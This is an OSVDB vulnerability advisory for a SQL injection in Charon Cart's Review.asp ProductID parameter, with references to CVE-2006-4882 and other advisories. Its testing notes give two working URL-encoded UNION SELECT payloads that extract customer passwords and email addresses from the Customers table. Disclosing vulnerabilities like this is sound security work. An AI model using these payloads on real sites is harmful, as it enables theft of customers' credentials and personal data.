Charon Cart Review.asp ProductID Variable SQL Injection

2006-09-17T11:48:57
ID OSVDB:28951
Type osvdb
Reporter OSVDB
Modified 2006-09-17T11:48:57

Description

Manual Testing Notes

/Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201 /Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201

References:

Vendor URL: http://www.charon.co.uk/ Secunia Advisory ID:21987 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0281.html FrSIRT Advisory: ADV-2006-3683 CVE-2006-4882 Bugtraq ID: 20083